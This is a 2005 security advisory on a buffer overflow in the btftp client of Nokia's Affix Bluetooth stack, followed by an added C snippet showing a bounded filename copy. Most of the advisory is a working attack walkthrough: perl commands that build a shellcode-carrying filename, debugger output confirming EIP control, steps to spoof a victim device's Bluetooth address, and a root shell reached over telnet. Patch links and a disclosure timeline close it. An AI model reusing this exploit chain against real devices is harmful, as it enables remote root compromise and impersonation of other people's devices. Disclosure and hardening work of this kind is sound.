DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'

Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: http://www.digitalmunition.com/DMA[2005-0712a].txt

Description:

Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel', which provides kernel modules, and 'affix', which provides control tools, libraries, and server daemons. Although Nokia believes that Affix is a useful piece of software, please bear in mind that it is not an official Nokia product, but a result of the research activity of Nokia Research Center.

The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the processing of long filenames. By placing a 102 character filename into a public bluetooth share you are able to overwrite the eip (on an x86 version) of the btftp client.

In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with OBEX File Transfer. Place a test file in the public bluetooth share.

root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"`

Connect from a vulnerable client machine in order to demonstrate the overflow.

Starting program: /usr/bin/btctl ftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
----- 0 AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i r
eax            0x10       16
ecx            0x0        0
edx            0x4001a1e3 1073848803
ebx            0x41414141 1094795585
esp            0xbffffbc0 0xbffffbc0
ebp            0x41414141 0x41414141
esi            0x41414141 1094795585
edi            0x41414141 1094795585
eip            0x41424344 0x41424344
(gdb) x/4s $esp-100
0xbffffb5c: " Info"
0xbffffb62: "er"
0xbffffb65: 'A' , "DCBA"
0xbffffbc1: " \001@À\217\005\b"

As a quick test we will use anathema@hack.co.za's 0xff-less execve() /bin/sh shellcode and a bit of perl to see if we can execute code.

root@frieza:~# cd /var/spool/affix/Inbox/
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x (94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '`
root@frieza:/var/spool/affix/Inbox# ls
?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[???

As you can see we are able to run our payload on the client machine; however, in this case the shellcode needs to be swapped out for something more useful.

threat:~# btftp
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-rwdx 1512 ffless.c
-rwdx 12605 ffless
-rwdx 0 ° Í

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c20 in ?? () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b#

Keep in mind that in order to exploit this the attacker MUST be able to convince the target to browse an obex file share that is under control of the attacker. Using an Ericsson ROK 101 008 bluetooth chip will increase our chances of success. Below is an example impersonation scenario. First let's find someone to impersonate.

root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done.
Resolving names ... done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
    Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem"
    Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
    Computer (Handheld PC/PDA) [Networking,Object Transfer]

Let's pretend to be some poor chap's PDA! We need to steal his BD_ADDR first.

root@frieza:~# btctl
bt0     01:02:03:04:05:06
        Flags: UP DISC CONN
        RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
        TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
        Security: service pair [-auth, -encrypt]
        Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
        Role: deny switch, remain slave
root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c
--11:50:18--  http://www.digitalmunition.com/setbd-affix.c
           => `setbd-affix.c'
Resolving www.digitalmunition.com... 195.74.102.163
Connecting to www.digitalmunition.com[195.74.102.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,951 [text/plain]

100%[================================================================================>] 2,951        --.--K/s

11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951]

root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix
root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8
root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0     00:04:3e:65:a1:c8
        Flags: UP DISC CONN
        RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
        TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
        Security: service pair [-auth, -encrypt]
        Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
        Role: deny switch, remain slave
root@frieza:~# btctl name "Pocket_PC"

God I love my ROK chip!

Start up btsrv and wait for a connection from your target.

btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11

You can tell that the target has connected by looking for the following in your btsrv logs.

btsrv: handle_input: Connection from 00:0c:76:46:f0:21 channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2

Upon connecting and performing a file list the target would see the following.

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V Ï­¹¿)ýÞ ýÞÑýÞÐÉî¼Xq¶X6¶Y0

At this point your payload is running. After they have been exploited you could use a hijacked PAND connection to obtain your shell prompt. Or perhaps write some bluetooth-aware shellcode.

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found

Official patches for Affix can be found at http://affix.sourceforge.net

http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch

This is the basic timeline associated with this bug.

07/12/05 Public disclosure
07/11/05 Noticed that a security update patch for affix-3.2.0 was posted 07/01/05
07/06/05 Ask Carlos for update...
07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081
06/17/05 Carlos.Chinea stated "you are using an old version of affix...Please update"
06/14/05 Carlos.Chinea contacted

-KF
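As an added illustration of the defect class behind this advisory (this is not Affix's own source), the hardened form of the filename copy that a listing parser should perform, run over a constructed listing that includes the 102-byte "A...ADCBA" name from the test above. The buffer size NAME_BUF and the function names are assumptions; btftp's real buffer size is not stated in the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 100   /* hypothetical; btftp's real buffer size is not given above */

/* Hardened replacement for an unchecked "strcpy(name, remote)": returns 0
 * with dst NUL-terminated, or -1 when the remote name would not fit
 * (terminator included) or holds non-printable bytes that corrupt the terminal. */
int copy_remote_name(const char *src, char *dst, size_t dst_len)
{
    size_t n = 0;
    while (n < dst_len && src[n] != '\0')   /* never scan past dst_len */
        n++;
    if (n >= dst_len)
        return -1;                          /* too long: reject outright */
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)src[i]))
            return -1;                      /* binary junk in a name */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Walks a remote listing, prints accepted names the way btftp's "ls" does,
 * and returns how many entries were rejected. */
int list_entries(const char *const *names, size_t count)
{
    char name[NAME_BUF];
    int rejected = 0;
    for (size_t i = 0; i < count; i++) {
        if (copy_remote_name(names[i], name, sizeof name) == 0)
            printf("----- 0 %s\n", name);
        else
            rejected++;
    }
    return rejected;
}

/* Constructed listing mirroring the advisory: three benign entries plus a
 * 102-byte name of 98 'A's followed by "DCBA". Returns the rejected count. */
int demo_listing(void)
{
    static char overlong[103];
    memset(overlong, 'A', 98);
    memcpy(overlong + 98, "DCBA", 5);       /* includes the terminator */
    const char *names[] = { overlong, "Faxes", "New Folder", "SC Info" };
    return list_entries(names, sizeof names / sizeof names[0]);
}
```

Rejecting rather than silently truncating keeps a crafted share from ever reaching the copy, which is the check the patched builds linked above have to provide.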